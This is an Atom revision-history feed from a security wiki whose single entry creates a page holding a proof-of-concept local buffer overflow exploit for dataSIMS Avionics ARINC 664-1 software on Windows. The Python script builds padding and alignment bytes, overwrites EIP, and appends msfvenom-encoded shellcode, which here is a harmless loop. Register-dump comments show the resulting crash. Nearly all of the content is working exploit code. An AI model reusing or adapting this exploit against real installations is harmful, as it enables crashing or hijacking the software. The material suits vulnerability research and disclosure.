<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=DataSIMS_Avionics_ARINC_664-1_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>DataSIMS Avionics ARINC 664-1 本地緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=DataSIMS_Avionics_ARINC_664-1_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=DataSIMS_Avionics_ARINC_664-1_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-26T13:57:33Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=DataSIMS_Avionics_ARINC_664-1_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=639&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==POC== &lt;pre&gt; # Exploit Title: dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC) # Exploit Author:  Kağan Çapar # Date: 2020-02-17 # Vendor Homepage: https://www.d...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=DataSIMS_Avionics_ARINC_664-1_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=639&amp;oldid=prev"/>
		<updated>2021-03-23T02:41:06Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==POC== &amp;lt;pre&amp;gt; # Exploit Title: dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC) # Exploit Author:  Kağan Çapar # Date: 2020-02-17 # Vendor Homepage: https://www.d...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC)&lt;br /&gt;
# Exploit Author:  Kağan Çapar&lt;br /&gt;
# Date: 2020-02-17&lt;br /&gt;
# Vendor Homepage: https://www.ddc-web.com/&lt;br /&gt;
# Software Link: https://www.ddc-web.com/en/connectivity/databus/milstd1553-1/software-1/bu-69414?partNumber=BU-69414&lt;br /&gt;
# Version: 4.5.3&lt;br /&gt;
# Tested On: Windows 10 Enterprise (x64)&lt;br /&gt;
# about Sofware: &lt;br /&gt;
# dataSIMS, an all-in-one Avionics Bus Analysis &amp;amp; Simulation Software Tool, provides an easy-to-use graphical interface, simplifying any MIL-STD-1553 or ARINC 429 testing effort.&lt;br /&gt;
# about ARINC 664-1:&lt;br /&gt;
# ARINC 664 is a multipart specification that defines an Ethernet data network for aircraft installations. &lt;br /&gt;
# Part 7 of ARINC 664 defines a deterministic network, also known as Avionics Full Duplex Switched Ethernet (or AFDX®).&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/env python&lt;br /&gt;
# -*- coding: UTF-8 -*-&lt;br /&gt;
&lt;br /&gt;
import struct&lt;br /&gt;
import binascii&lt;br /&gt;
import os&lt;br /&gt;
import sys&lt;br /&gt;
&lt;br /&gt;
#EAX : 00000000&lt;br /&gt;
#EBX : 00000000&lt;br /&gt;
#ECX : 42424242&lt;br /&gt;
#EDX : 77B96330     ntdll.77B96330&lt;br /&gt;
#EBP : 000A1328&lt;br /&gt;
#ESP : 000A1308&lt;br /&gt;
#ESI : 00000000&lt;br /&gt;
#EDI : 00000000&lt;br /&gt;
#EIP : 42424242&lt;br /&gt;
#EFLAGS : 00010246&lt;br /&gt;
&lt;br /&gt;
#LastError : 00000000 (ERROR_SUCCESS)&lt;br /&gt;
#LastStatus : C0000034 (STATUS_OBJECT_NAME_NOT_FOUND)&lt;br /&gt;
#Last chance expection on 42424242 (C0000005, EXPECTION_ACCESS_VIOLATION)!&lt;br /&gt;
&lt;br /&gt;
file = open(&amp;quot;milstd1553result.txt&amp;quot;, &amp;quot;w&amp;quot;)&lt;br /&gt;
junk = &amp;quot;\x41&amp;quot; * 600&lt;br /&gt;
align = &amp;quot;\x32&amp;quot; * 4 + &amp;quot;\x31&amp;quot; * 4&lt;br /&gt;
prop = &amp;quot;\x43&amp;quot; * 380&lt;br /&gt;
imp = &amp;quot;\x62\x7a\x68\x72\x74\x75\x72\x6c\x75\x32&amp;quot;&lt;br /&gt;
imp2 = &amp;quot;\x61\x72\x61\x63\x61\x67\x131\x7a&amp;quot;&lt;br /&gt;
&lt;br /&gt;
#EIP Overwrite junk value&lt;br /&gt;
overwrite = &amp;quot;\x42&amp;quot; * 4&lt;br /&gt;
&lt;br /&gt;
#Payload size: 29 bytes&lt;br /&gt;
#Final size of py file: 160 bytes&lt;br /&gt;
&lt;br /&gt;
#msfvenom -p generic/tight_loop --platform windows_86 -f py -e x86/shikata_ga_nai&lt;br /&gt;
&lt;br /&gt;
buf =  b&amp;quot;&amp;quot;&lt;br /&gt;
buf += b&amp;quot;\xda\xc1\xd9\x74\x24\xf4\x58\xbb\x0b\x7e\x97\x62\x33&amp;quot;&lt;br /&gt;
buf += b&amp;quot;\xc9\xb1\x01\x31\x58\x19\x83\xe8\xfc\x03\x58\x15\xe9&amp;quot;&lt;br /&gt;
buf += b&amp;quot;\x8b\x7c\x9c&amp;quot;&lt;br /&gt;
&lt;br /&gt;
win32 = junk + align + prop + imp + imp2 + overwrite + buf&lt;br /&gt;
&lt;br /&gt;
print len(win32)&lt;br /&gt;
file.write(win32)&lt;br /&gt;
file.close()&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>